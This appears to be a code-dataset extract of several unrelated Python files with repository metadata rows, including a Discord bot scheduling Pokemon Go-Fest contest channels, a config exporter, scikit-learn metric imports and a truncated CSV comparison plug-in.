embed.add_field(name="Rules", value="* Catch Shinies\n* Tell us your final Shiny count at the end of Go-Fest Weekend (honor system, I probably won't ask for screenshots)")
embed.add_field(name="Notes", value="* All entries must be submitted by 10pm on Sunday\n* You can only win 1 of the Most Shiny contests")
embed.add_field(name="Prize", value="$10 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out.")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"highest-iv-rotom",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Highest IV of Rotom (Wash Form)", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 26 10pm")
embed.add_field(name="Rules", value="* Take snapshots to get Photobombed by Rotom during GoFest\n* Post your IV Appraisal for Rotom")
embed.add_field(name="Notes", value="* All entries must be submitted by 10pm on Sunday\n* You can get 5 encounters per day")
embed.add_field(name="Prize", value="$15 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out (most likely by weight, so make sure you screenshot it unevolved and include the weight).")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"highest-iv-victini",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Highest IV Victini", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 30 10pm")
embed.add_field(name="Rules", value="* Complete the Special Research given on Day 2\n* Post your IV Appraisal for Victini")
embed.add_field(name="Notes", value="* All entries must be submitted by 10pm on Thursday\n* These rules may be modified based on the contents of the Special Research, Rotom will announce the Special Pokemon for this contest before the start of the Entry Period")
embed.add_field(name="Prize", value="$15 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out (most likely by weight, so make sure you screenshot it unevolved and include the weight).")
msg = await chan.send(embed=embed)
await msg.pin()
@tasks.loop(minutes=1.0)
async def contest(self):
dt = datetime.now()
guild = self.bot.get_guild(331635573271822338)
permstart = discord.PermissionOverwrite()
permstart.read_messages = True
permstart.send_messages = True
permstart.add_reactions = True
permend = discord.PermissionOverwrite()
permend.read_messages = True
permend.send_messages = False
permend.add_reactions = True
permvote = discord.PermissionOverwrite()
permvote.read_messages = True
permvote.send_messages = False
permvote.add_reactions = False
roles = [335996722775851009, 335997012619296770, 335997104088416256]
# Start 7/25 10am
if 1595689800 <= int(math.floor(dt.timestamp())) < 1595689860:
for role in roles:
await self.bot.get_channel(735863543634722877).set_permissions(guild.get_role(role), overwrite=permstart)
await self.bot.get_channel(735863548596584478).set_permissions(guild.get_role(role), overwrite=permstart)
await self.bot.get_channel(735863556745986068).set_permissions(guild.get_role(role), overwrite=permstart)
await self.bot.get_channel(735863560726380658).set_permissions(guild.get_role(role), overwrite=permstart)
await self.bot.get_channel(735863565826916418).set_permissions(guild.get_role(role), overwrite=permstart)
print("Start 7/25 10am")
# End 7/25 9pm
elif 1595728800 <= int(math.floor(dt.timestamp())) < 1595728860:
for role in roles:
await self.bot.get_channel(735863548596584478).set_permissions(guild.get_role(role), overwrite=permend)
print("End 7/25 9pm")
# Start 7/26 10am
elif 1595775600 <= int(math.floor(dt.timestamp())) < 1595775660:
for role in roles:
await self.bot.get_channel(735863552019136535).set_permissions(guild.get_role(role), overwrite=permstart)
print("Start 7/26 10am")
# End 7/26 9pm
elif 1595815200 <= int(math.floor(dt.timestamp())) < 1595815260:
for role in roles:
await self.bot.get_channel(735863543634722877).set_permissions(guild.get_role(role), overwrite=permend)
await self.bot.get_channel(735863552019136535).set_permissions(guild.get_role(role), overwrite=permend)
print("End 7/26 9pm")
# End 7/26 10pm
elif 1595818800 <= int(math.floor(dt.timestamp())) < 1595818860:
for role in roles:
await self.bot.get_channel(735863556745986068).set_permissions(guild.get_role(role), overwrite=permend)
await self.bot.get_channel(735863560726380658).set_permissions(guild.get_role(role), overwrite=permend)
print("End 7/26 10pm")
# Vote 7/28 10pm
elif 1595991600 <= int(math.floor(dt.timestamp())) < 1595991660:
for role in roles:
await self.bot.get_channel(735863556745986068).set_permissions(guild.get_role(role), overwrite=permvote)
print("Vote 7/28 10pm")
# End 7/30 10pm
elif 1596164400 <= int(math.floor(dt.timestamp())) < 1596164460:
for role in roles:
await self.bot.get_channel(735863556745986068).set_permissions(guild.get_role(role), overwrite=permend)
print("End 7/30 10pm")
else:
if dt.minute == 0:
print("I need to know I'm running")
@contest.before_loop
async def before_contest(self):
await self.bot.wait_until_ready()
| 69.821782 | 411 | 0.703417 | 13,951 | 0.989152 | 0 | 0 | 13,805 | 0.9788 | 13,702 | 0.971497 | 5,458 | 0.386982 |
d371bded9db80d5ecfc09ed0c62cf85341632ea2 | 254 | py | Python | NLP_Flask/app/data_manage_api/__init__.py | Gxy-2001/NLPPlat | f339c1a7452b979b413919cf4bc128bf45af52ef | [
"MIT"
] | null | null | null | NLP_Flask/app/data_manage_api/__init__.py | Gxy-2001/NLPPlat | f339c1a7452b979b413919cf4bc128bf45af52ef | [
"MIT"
] | null | null | null | NLP_Flask/app/data_manage_api/__init__.py | Gxy-2001/NLPPlat | f339c1a7452b979b413919cf4bc128bf45af52ef | [
"MIT"
] | null | null | null | from flask import Blueprint
api = Blueprint("data_manage_api", __name__)
from . import data_venation
from . import operator_manage
from . import model_manage
from . import resource_manage
from . import pipeline_manage
from . import trainedmodel_manage
| 23.090909 | 44 | 0.818898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 0.066929 |
d372157180938920e4a54857c2c755457a97eb30 | 5,349 | py | Python | cfg_exporter/exports/py_export.py | dong50252409/cfg_exporter | 8e6fdfef00dbb228eb34ffdf4c1c23a74f1d7e18 | [
"MIT"
] | 3 | 2021-12-10T10:26:15.000Z | 2022-02-11T08:34:31.000Z | cfg_exporter/exports/py_export.py | dong50252409/cfg_exporter | 8e6fdfef00dbb228eb34ffdf4c1c23a74f1d7e18 | [
"MIT"
] | null | null | null | cfg_exporter/exports/py_export.py | dong50252409/cfg_exporter | 8e6fdfef00dbb228eb34ffdf4c1c23a74f1d7e18 | [
"MIT"
] | 1 | 2022-02-11T09:16:00.000Z | 2022-02-11T09:16:00.000Z | import os
import typing
import cfg_exporter.custom as custom
from cfg_exporter.const import DataType
from cfg_exporter.const import TEMPLATE_EXTENSION
from cfg_exporter.exports.base.export import BaseExport
from cfg_exporter.lang_template import lang
from cfg_exporter.tables.base.type import DefaultValue
EXTENSION = 'py'
BASE_TEMPLATE_PATH = os.path.join(os.path.dirname(__file__), 'template', EXTENSION)
BASE_TEMPLATE = f'{EXTENSION}_base.{TEMPLATE_EXTENSION}'
def _by_default(value):
"""
默认Iter类型格式化
"""
return f'{value}'
def _by_reference(replace_table):
"""
引用Iter类型格式化
"""
return lambda value: _get_reference(replace_table, value)
def _get_reference(replace_table, value):
key = _by_default(value)
if key in replace_table:
_, layer_num, index_num = replace_table[key]
return f'_rt_{layer_num}[{index_num}]'
return f'{value}'
# Iter类型格式化函数
_format_iter_value = _by_default
def format_value(value):
if isinstance(value, DataType.str):
return f'"{value}"'
elif isinstance(value, DataType.lang):
return f'"{lang(value.text)}"'
elif isinstance(value, DataType.iter):
return _format_iter_value(value)
elif isinstance(value, DefaultValue):
return format_value(value.text)
else:
return f'{value}'
_data_type_details = {
'lang': 'str',
'iter': 'typing.Union[list, tuple]',
'raw': 'typing.Any'
}
class PyExport(BaseExport):
def __init__(self, args):
global_vars = {'format_value': format_value}
super().__init__(args, BASE_TEMPLATE_PATH, [EXTENSION], global_vars)
def export(self, table_obj) -> typing.NoReturn:
global _format_iter_value
if self.args.py_optimize:
replace_table, reference_table = _analyze_reference_table(table_obj)
default_values = custom.analyze_default_value(table_obj)
_format_iter_value = _by_reference(replace_table)
else:
reference_table = []
default_values = {}
_format_iter_value = _by_default
ctx = {
'table_obj': table_obj, 'prefix': self.args.file_prefix,
'reference_table': reference_table, 'default_values': default_values
}
table_name = table_obj.table_name
filename = f'{table_name}.{EXTENSION}'
if table_name in self.extend_templates.get(EXTENSION, []):
self.render(filename, f'{table_name}.{EXTENSION}.{TEMPLATE_EXTENSION}', ctx)
else:
self.render(filename, BASE_TEMPLATE, ctx)
def file_desc(self) -> str:
return "######################################\n" \
"# AUTO GENERATE BY CFG_EXPORTER #\n" \
"######################################\n"
@staticmethod
def naming_convention() -> typing.Any:
import cfg_exporter.util as util
return util.snake_case
@staticmethod
def data_type_detail(data_type_str) -> str:
return _data_type_details.get(data_type_str, data_type_str)
def _analyze_reference_table(table_obj):
"""
统计替换引用表
"""
replace_table = {}
for field_name, data_type in zip(table_obj.field_names, table_obj.data_types):
if field_name in table_obj.key_field_name_iter:
continue
if data_type is DataType.iter:
for value in table_obj.data_iter_by_field_names(field_name):
_stat_replace_table_layer(replace_table, value, 0)
_stat_replace_table_index(replace_table)
reference_table = _stat_reference_table(replace_table)
return replace_table, reference_table
def _stat_replace_table_layer(reference_table, value, layer_num):
"""
统计替换表的最高层级
"""
if isinstance(value, DataType.iter.value.real_type):
for child_value in value:
if isinstance(child_value, DataType.iter.value.real_type):
_stat_replace_table_layer(reference_table, child_value, layer_num + 1)
key = _by_default(value)
if key in reference_table:
if reference_table[key][1] < layer_num:
reference_table[key] = (value, layer_num)
else:
reference_table[key] = (value, layer_num)
def _stat_replace_table_index(reference_table):
"""
统计替换表的元素下标
"""
index_dict = {}
for key, (value, layer_num) in reference_table.items():
replace_rt = _replace_rt_table(reference_table, value)
index = index_dict.get(layer_num, 0)
index_dict[layer_num] = index
reference_table[key] = (replace_rt, layer_num, index)
def _replace_rt_table(reference_table, value):
"""
替换引用表的上级引用
"""
if isinstance(value, (list, tuple)):
t = ', '.join(_get_reference(reference_table, v) if isinstance(v, (list, tuple)) else f'{v}' for v in value)
if isinstance(value, list):
return f'[{t}]'
elif isinstance(value, tuple):
return f'({t})'
return f'{value}'
def _stat_reference_table(replace_table):
"""
统计生成引用表
"""
rt_dict = {}
for rt_value, layer_num, _index_num in replace_table.values():
layer_list = rt_dict.get(layer_num, [])
layer_list.append(rt_value)
rt_dict[layer_num] = layer_list
return sorted(rt_dict.items(), key=lambda item: item[0], reverse=True)
| 30.392045 | 116 | 0.653019 | 1,616 | 0.294944 | 0 | 0 | 257 | 0.046906 | 0 | 0 | 835 | 0.1524 |
d372b26a4d6a57f99ba77b4687d599e40f2a2efe | 774 | py | Python | app/state.py | AnsGoo/cronJob | 0f9aedbe2ffe3c405376c13a7c2d24540360bd0e | [
"MIT"
] | 11 | 2021-06-27T05:00:09.000Z | 2022-02-15T14:31:21.000Z | app/state.py | AnsGoo/cornJob | 0f9aedbe2ffe3c405376c13a7c2d24540360bd0e | [
"MIT"
] | 1 | 2021-12-01T12:20:54.000Z | 2021-12-08T11:54:12.000Z | app/state.py | AnsGoo/cornJob | 0f9aedbe2ffe3c405376c13a7c2d24540360bd0e | [
"MIT"
] | 2 | 2021-06-27T05:00:16.000Z | 2021-08-09T06:36:09.000Z | from typing import Any
from starlette.datastructures import State
class DefaultState:
state = State()
def get(self,key:str, value: Any = None) -> Any:
if hasattr(self.state, key):
return getattr(self.state, key)
else:
if not value:
raise Exception('state don`t %s attribute' %key)
else:
return value
def set(self, key:str, value: Any) -> None:
if hasattr(self.state, key):
raise Exception('state don`t %s attribute' %key)
else:
setattr(self.state, key, value)
def update(self, key:str, value: Any) -> None:
if hasattr(self.state, key):
setattr(self.state, key, value)
default_state = DefaultState()
| 24.1875 | 64 | 0.568475 | 671 | 0.866925 | 0 | 0 | 0 | 0 | 0 | 0 | 52 | 0.067183 |
d374a451e2dd0106d96875a415ef683426b13aa3 | 3,260 | py | Python | venv/lib/python2.7/site-packages/sklearn/metrics/__init__.py | bopopescu/fbserver | e812dbc4dc0cbf2fda19473015a3d7e253718a19 | [
"Apache-2.0"
] | null | null | null | venv/lib/python2.7/site-packages/sklearn/metrics/__init__.py | bopopescu/fbserver | e812dbc4dc0cbf2fda19473015a3d7e253718a19 | [
"Apache-2.0"
] | null | null | null | venv/lib/python2.7/site-packages/sklearn/metrics/__init__.py | bopopescu/fbserver | e812dbc4dc0cbf2fda19473015a3d7e253718a19 | [
"Apache-2.0"
] | 1 | 2020-07-23T19:26:19.000Z | 2020-07-23T19:26:19.000Z | """
The :mod:`sklearn.metrics` module includes score functions, performance metrics
and pairwise metrics and distance computations.
"""
from .metrics import (accuracy_score,
average_precision_score,
auc,
roc_auc_score,
classification_report,
confusion_matrix,
explained_variance_score,
f1_score,
fbeta_score,
hamming_loss,
hinge_loss,
jaccard_similarity_score,
log_loss,
matthews_corrcoef,
mean_squared_error,
mean_absolute_error,
precision_recall_curve,
precision_recall_fscore_support,
precision_score,
recall_score,
r2_score,
roc_curve,
zero_one_loss)
# Deprecated in 0.16
from .metrics import auc_score
from .scorer import make_scorer, SCORERS
from . import cluster
from .cluster import (adjusted_rand_score,
adjusted_mutual_info_score,
completeness_score,
homogeneity_completeness_v_measure,
homogeneity_score,
mutual_info_score,
normalized_mutual_info_score,
silhouette_score,
silhouette_samples,
v_measure_score,
consensus_score)
from .pairwise import (euclidean_distances,
pairwise_distances,
pairwise_distances_argmin_min,
pairwise_distances_argmin,
pairwise_kernels)
__all__ = ['accuracy_score',
'adjusted_mutual_info_score',
'adjusted_rand_score',
'auc',
'roc_auc_score',
'average_precision_score',
'classification_report',
'cluster',
'completeness_score',
'confusion_matrix',
'euclidean_distances',
'pairwise_distances_argmin_min',
'explained_variance_score',
'f1_score',
'fbeta_score',
'hamming_loss',
'hinge_loss',
'homogeneity_completeness_v_measure',
'homogeneity_score',
'jaccard_similarity_score',
'log_loss',
'matthews_corrcoef',
'mean_squared_error',
'mean_absolute_error',
'mutual_info_score',
'normalized_mutual_info_score',
'pairwise_distances',
'pairwise_distances_argmin',
'pairwise_distances_argmin_min',
'pairwise_kernels',
'precision_recall_curve',
'precision_recall_fscore_support',
'precision_score',
'r2_score',
'recall_score',
'roc_curve',
'silhouette_score',
'silhouette_samples',
'v_measure_score',
'consensus_score',
'zero_one_loss',
'make_scorer',
'SCORERS']
| 33.265306 | 79 | 0.513497 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 976 | 0.299387 |
d377cc64f12358cddf2bd8d3cd61a85effd3e4d2 | 29,736 | py | Python | dacman/plugins/csv/__init__.py | yocheah/dac-man | 758849decf26f40fdc89f10cd29b1340e344008d | [
"BSD-3-Clause"
] | null | null | null | dacman/plugins/csv/__init__.py | yocheah/dac-man | 758849decf26f40fdc89f10cd29b1340e344008d | [
"BSD-3-Clause"
] | null | null | null | dacman/plugins/csv/__init__.py | yocheah/dac-man | 758849decf26f40fdc89f10cd29b1340e344008d | [
"BSD-3-Clause"
] | null | null | null | from pathlib import Path
from collections import defaultdict
import numpy as np
try:
import pandas as pd
except ImportError:
from dacman.core.utils import dispatch_import_error
dispatch_import_error(module_name='pandas', plugin_name='CSV')
from dacman.compare import base
try:
from IPython.display import display # for debugging
except ImportError:
display = print
class ChangeStatus:
added = 'ADDED'
deleted = 'DELETED'
modified = 'MODIFIED'
unchanged = 'UNCHANGED'
unset = 'UNSET'
@classmethod
def iter(cls):
yield from (cls.added, cls.deleted, cls.modified, cls.unchanged)
_S = ChangeStatus
class _InternalFields:
"""
Utility class to access commonly used table/dict fields as constants rather than bare strings.
"""
LOC_ORIG_ROW = '_loc_orig_row'
LOC_ORIG_COL = '_loc_orig_col'
ORIG = 'orig'
CALC = 'calc'
_F = _InternalFields
class ChangeMetricsBase:
"""
Convenience class to access properties from items being compared and calculate comparison metrics from them.
"""
def __init__(self, key, a=None, b=None):
self.key = key
self.a = a
self.b = b
self._comparison_data = {
'status': _S.unset,
'metadata': {
'common': {},
'changes': {},
},
}
def __setitem__(self, key, val):
self._comparison_data[key] = val
def __getitem__(self, key):
return self._comparison_data[key]
def keys(self):
# TODO maybe enforce some order?
return self._comparison_data.keys()
def add(self, other_data):
self._comparison_data.update(other_data)
@property
def properties(self):
# only interested in common fields, since we have to compare them directly
# return self.a.keys() & self.b.keys()
# use a dict with dummy values as an ordered set to preserve the order
dict_for_ordered_set = {key: None for key in self.a.keys() if key in self.b.keys()}
return dict_for_ordered_set.keys()
@property
def is_missing_a(self):
return len(self.a) == 0
@property
def is_missing_b(self):
return len(self.b) == 0
def change_in(self, prop):
if prop not in self.properties:
return False
try:
return self.a[prop] != self.b[prop]
except Exception as e:
print(e)
return False
def get_value_common(self, prop):
if prop in self.properties and not self.change_in(prop):
return self.a[prop]
# maybe use a sentinel value other than None here?
return None
def get_value_single(self, prop):
if self.is_missing_a:
return self.b[prop]
if self.is_missing_b:
return self.a[prop]
return self.get_value_common(prop)
def get_values(self, prop, orient=dict, convert=None, as_type=None, fallback=None):
if convert is None and as_type is not None:
convert = as_type
convert = convert or (lambda x: x)
val_a = convert(self.a.get(prop, fallback))
val_b = convert(self.b.get(prop, fallback))
if orient in {tuple, list}:
return val_a, val_b
if orient in {dict}:
return {'a': val_a, 'b': val_b}
@property
def is_modified(self):
# TODO change if we use multiple modified states
return self['status'] in {_S.modified}
@is_modified.setter
def is_modified(self, val):
if bool(val) is True:
# TODO manage other types as extra "modified" characterizers
# e.g. if `val` is a list, append to self['modified_labels']
self['status'] = _S.modified
def store_common_value_or_values(self, prop):
# TODO there could be some redundant logic in general in this class
if self.change_in(prop):
self['metadata']['changes'][prop] = self.get_values(prop, orient=dict)
self.is_modified = True
else:
self['metadata']['common'][prop] = self.get_value_single(prop)
def calculate(self, exclude=None):
exclude = exclude or set()
if self.is_missing_a:
self['status'] = _S.added
elif self.is_missing_b:
self['status'] = _S.deleted
for prop in self.properties:
if prop not in exclude:
self.store_common_value_or_values(prop)
if self['status'] == _S.unset:
self['status'] = _S.unchanged
class TableColumnChangeMetrics(ChangeMetricsBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def calculate(self):
super().calculate(exclude='values_frame')
if self['status'] == _S.unset:
self['status'] = _S.unchanged
def calculate_from_value_metrics(self, value_metrics_table):
col_metrics_from_value_metrics = self.get_column_metrics_from_values(value_metrics_table)
if col_metrics_from_value_metrics['frac_changed'] > 0.:
self.is_modified = True
self['values'] = col_metrics_from_value_metrics
def get_column_metrics_from_values(self, metrics_table):
m = {}
df = metrics_table
n_total = len(df)
m['n_unchanged'] = (df['status'] == _S.unchanged).sum()
m['n_added'] = (df['status'] == _S.added).sum()
m['n_deleted'] = (df['status'] == _S.deleted).sum()
m['n_modified'] = (df['status'] == _S.modified).sum()
m['n_changed'] = (m['n_added'] + m['n_deleted'] + m['n_modified'])
m['frac_changed'] = m['n_changed'] / n_total
if not (df['delta'].isnull().all()):
m['delta_mean'] = df['delta'].mean()
m['delta_std'] = df['delta'].std()
return m
def get_stats(self):
stats = {'name': self.key}
stats.update(self['values'])
stats['status'] = self['status']
return stats
class _BaseRecord:
@staticmethod
def default_key_getter(item):
raise NotImplementedError
def __init__(self, key_getter=None, **kwargs):
super().__init__(**kwargs)
self.key_getter = key_getter or type(self).default_key_getter
self._mapping = self.get_mapping()
def get_mapping(self):
return {}
def keys(self):
return self._mapping.keys()
def __getitem__(self, key):
return self._mapping[key]
def get_empty(self):
return dict()
def get(self, key):
# TODO should we customize the default return type at the level of the class or of the instance?
return self._mapping.get(key, self.get_empty())
class TableColumnsRecord(_BaseRecord):
# TODO this class should probably also deal with the field renames,
# i.e. should receive a mapping with the field renames
def __init__(self, loader, **kwargs):
self.loader = loader
super().__init__(**kwargs)
@property
def dataframe(self):
return self.loader.to_table_dtype()
def get_metadata(self, series, name):
md = {}
md['name'] = name
md['series'] = series
md['dtype'] = series.dtype
md['n_notnull'] = series.notnull().sum()
md['n_null'] = series.isna().sum()
return md
def default_key_getter(self, col_metadata):
return col_metadata['name']
def get_mapping(self):
df = self.dataframe
mapping = {}
for colname in df:
# TODO in general the metadata collecting can also be done directly in the Record,
# since here we don't have several types of items at the same level like in the HDF5 plug-in
col_md = self.get_metadata(series=df[colname], name=colname)
# we don't need a specific record for table fields, since these are collected as metadata of the columns
mapping[self.key_getter(col_md)] = col_md
return mapping
def get_lines_frame(path, comment_char=None):
"""Read lines and associated metadata from a file"""
with Path(path).open() as f:
lines = pd.DataFrame({'content': list(f)})
lines['lineno'] = lines.index + 1
def is_comment(s):
if comment_char is None:
# get a series where all values are False
return s == np.nan
return (s
.astype(str)
.str.startswith(comment_char)
)
lines['is_comment'] = is_comment(lines['content'])
return lines
def infer_dtypes(data, converters=None):
# the order here is relevant: strings representing floats can be read (erroneously) as datetimes,
# but the reverse is not true, so pd.to_numeric should come first
converters = converters or [pd.to_numeric, pd.to_datetime]
if data.dtype == 'object':
for conv in converters:
try:
data = conv(data)
except (TypeError, ValueError):
pass
else:
break
return data
class ColumnnProcessor:
"""
Utility class to perform per-column processing and hold data in various formats
as needed to create the column-level metadata.
"""
def __init__(self, data_orig, name=None):
self.data_orig = data_orig
self.data_calc = None
self.name = name
self.header = {}
def process_header(self, data, pos_mapper=None, pos='rel', **kwargs):
# pos: relative or absolute
# relative: count from start of subrange
# absolute: use _loc_orig_row
indexer = data.iloc
if pos.startswith('abs'):
indexer = data.loc
pos_mapper = pos_mapper or kwargs
to_drop = []
for key, pos in pos_mapper.items():
val = indexer[pos]
self.header[key] = val
to_drop.append(pos)
return data.drop(indexer[to_drop].index)
def process_rename(self, data, mapper):
self.name = self.header.get('name', self.name)
self.name = mapper.get(self.name, self.name)
if self.name:
data.name = self.name
return data
def process_dtype(self, data, dtype):
if dtype is True:
data = infer_dtypes(data)
else:
if dtype is None:
dtype = {}
data.astype(dtype.get(self.name, data.dtype))
return data
def get_values_frame(self, data_orig, data_calc, index=None):
df = pd.DataFrame({_F.ORIG: data_orig, _F.CALC: data_calc}, index=data_calc.index)
# print(f'{self.name}: dtypes={df.dtypes}')
# so here there are three cases for the index:
# - a data column
# - orig
# - none (reset)
# - In this case, we don't particularly need to give it a name
# we can probably manage to express this by resetting the index in all three cases,
# and then setting the index appropriately
if isinstance(index, str) and index == 'orig':
df = df.reset_index().set_index(df.index.name, drop=False)
elif index is not None:
df = pd.merge(index, df, how='left', left_index=True, right_index=True).reset_index().set_index(index.name)
else:
# we need to be sure that we have the loc_orig_row as a column of this table
df = df.reset_index()
return df
class CSVTableColumnsRecord(_BaseRecord):
"""
Convert a CSV file into a table, and expose a record as Column in the usual way
"""
def __init__(self,
src,
comment_char=None,
drop_empty_cols=True,
table_range=None,
header=None,
column_renames=None,
index=None,
dtype=None,
):
self.src = src
self.comment_char = comment_char
self.drop_empty_cols = drop_empty_cols
self.table_range = table_range or {}
self.header = header or {}
self.column_renames = column_renames or {}
self.dtype = dtype
self.index = index
self._mapping = {}
@staticmethod
def get_lines_frame(path, comment_char=None):
"""Read lines and associated metadata from a file"""
with Path(path).open() as f:
lines = pd.DataFrame({'content': list(f)})
lines['lineno'] = lines.index + 1
def is_comment(s):
if comment_char is None:
# get a series with the same index where all values are False
return s == np.nan
return (s
.astype(str)
.str.startswith(comment_char)
)
lines['is_comment'] = is_comment(lines['content'])
return lines
def get_lineno_loadable(self):
"""
Return a sequence containing the line numbers (1-based) of lines in the source
that are loadable by the CSV parser.
This is used to associate table index/rows with their position in the source.
"""
def is_skipped_by_csv_parser(s):
# TODO redo this with more robust values
# (and maybe invert the logic to "is_included" while we're at it)
return s.astype(str) == '\n'
# TODO all of this could probably be merged in a regex
def is_loadable(df):
return ~(df['is_comment'] | is_skipped_by_csv_parser(df['content']))
lines = get_lines_frame(self.src, comment_char=self.comment_char)
return (lines
[is_loadable]
['lineno']
.to_list()
)
def get_table_orig(self, index_col=_F.LOC_ORIG_ROW):
load_opts = dict(dtype=object, header=None, comment=self.comment_char)
table_range = {'row_start': 1, 'row_end': None}
table_range.update(self.table_range)
row_idx_start = table_range['row_start'] - 1
row_idx_end = None
try:
row_idx_end = table_range['row_end'] - 1
except TypeError:
pass
load_opts['skiprows'] = range(0, row_idx_start)
if row_idx_end is not None:
# TODO check for off-by-1 errors
load_opts['nrows'] = row_idx_end - row_idx_start
df = pd.read_csv(self.src, **load_opts)
lineno = self.get_lineno_loadable()[row_idx_start:row_idx_end]
return (df
.assign(**{_F.LOC_ORIG_ROW: lineno})
.set_index(index_col, drop=True)
)
def get_metadata(self, col_processor, index=None):
md = {}
md['colidx'] = col_processor.colidx
md['name'] = col_processor.name
md['header'] = col_processor.header
md['values_frame'] = col_processor.get_values_frame(col_processor.data_orig,
col_processor.data_calc,
index=index)
return md
@staticmethod
def key_getter(metadata):
return metadata['name']
# TODO a more detailed name for this could be "get_column_metadata_mapping"
def get_mapping(self):
df = self.get_table_orig()
if self.drop_empty_cols:
df = df.dropna(axis='columns', how='all')
processors = []
index = None
for col in df:
proc = ColumnnProcessor(df[col], name=col)
proc.colidx = col
proc.data_calc = (proc.data_orig
.pipe(proc.process_header, **self.header)
.pipe(proc.process_rename, self.column_renames)
.pipe(proc.process_dtype, dtype=self.dtype)
)
if proc.name:
processors.append(proc)
proc.is_index = (proc.name == self.index)
if proc.is_index:
index = proc.data_calc
mapping = {}
for proc in processors:
md = self.get_metadata(proc, index=index)
mapping[self.key_getter(md)] = md
return mapping
def load(self):
self._mapping = self.get_mapping()
# this is just for display/reference, and it's not used for actual calculations
# self.table_calc = pd.DataFrame({name: md['values_frame']['calc'] for name, md in self._mapping.items()})
def get_empty(self):
return {'values_frame': pd.DataFrame([], columns=[_F.ORIG, _F.CALC, _F.LOC_ORIG_ROW])}
class TableValuesRecord(_BaseRecord):
def __init__(self, src: pd.DataFrame, **kwargs):
self.src = src
super().__init__(**kwargs)
def get_mapping(self):
df = self.src
mapping = {}
for colname in df:
col = df[colname]
for row_idx in col.index:
# this is basically the anti-pandas, but this is just here as an example
key = (colname, row_idx)
val = col[row_idx]
mapping[key] = val
return mapping
class TableColumnValuesChangeMetrics:
"""
Calculate change metrics on a per-value basis using indexed containers.
Instead of calculating value-level changes as a separate step,
i.e. creating a Record from each values frame and looping over matching pairs,
we use the fact that the value frame's index allow vectorized operations with similar semantics.
"""
@classmethod
def from_column_metrics(cls, col_metrics):
values_a, values_b = col_metrics.get_values('values_frame', orient=tuple)
return cls(values_a, values_b, col_metrics=col_metrics)
def __init__(self, values_a, values_b, col_metrics=None):
self.values_a = values_a
self.values_b = values_b
self.col_metrics = col_metrics
self._table = None
self._supports_numeric_delta = None
@property
def supports_numeric_delta(self):
return self._supports_numeric_delta
def get_table(self):
values_frames = {'a': self.values_a, 'b': self.values_b}
concat_opts = {
'axis': 'columns',
'join': 'outer',
'sort': False,
}
df = pd.concat(values_frames, **concat_opts)
# TODO factor out this dtype assignment?
return (df
.astype({('a', _F.LOC_ORIG_ROW): 'Int64', ('b', _F.LOC_ORIG_ROW): 'Int64'})
)
@property
def table(self):
return self._table
def calculate(self):
self._table = (self.get_table()
.pipe(self.calc_change_metrics_base)
.pipe(self.calc_delta)
.pipe(self.assign_change_status)
)
return self.get_per_status_metrics()
def calc_change_metrics_base(self, df):
df.loc[:, 'is_equal'] = df[('a', _F.CALC)] == df[('b', _F.CALC)]
df.loc[:, 'is_null_a'] = df[('a', _F.CALC)].isna()
df.loc[:, 'is_null_b'] = df[('b', _F.CALC)].isna()
df.loc[:, 'is_null_both'] = df['is_null_a'] & df['is_null_b']
df.loc[:, 'is_null_any'] = df['is_null_a'] | df['is_null_b']
return df
def calc_delta(self, df):
# here one could add more specific deltas, e.g. depending on dtype or column name (which is self.key)
# check if datatype is numeric, or try with exceptions?
# functions to check are: pandas.api.types.is_number etc
# TODO since we need to know whether we can do numeric calculations or not in several places,
# we could store this information as an attribute/property
try:
delta = df[('b', _F.CALC)] - df[('a', _F.CALC)]
except TypeError:
self._supports_numeric_delta = False
delta = np.nan
else:
self._supports_numeric_delta = True
df.loc[:, 'delta'] = delta
return df
def is_value_modified(self, df):
epsilon = 1e-6
if self.supports_numeric_delta:
return ~df['is_equal'] & (df['delta'].abs() > epsilon)
return ~df['is_equal']
def assign_change_status(self, df):
# TODO additional logic here would be e.g. implementing per-field or per-dtype thresholds
# TODO make this a categorical
status = pd.Series(_S.unset, index=df.index)
status[df['is_null_a'] & (~df['is_null_b'])] = _S.added
status[(~df['is_null_a']) & df['is_null_b']] = _S.deleted
status[(~df['is_null_any']) & self.is_value_modified(df)] = _S.modified
status[status == _S.unset] = _S.unchanged
df.loc[:, 'status'] = status
return df
def get_per_status_metrics(self):
m = {}
for status in [_S.unchanged, _S.added, _S.deleted, _S.modified]:
m_status = {}
values_with_status = self._table[lambda d: d['status'] == status]
has_with_status = len(values_with_status) > 0
if not has_with_status:
# this "continue" means that change statuses with no values
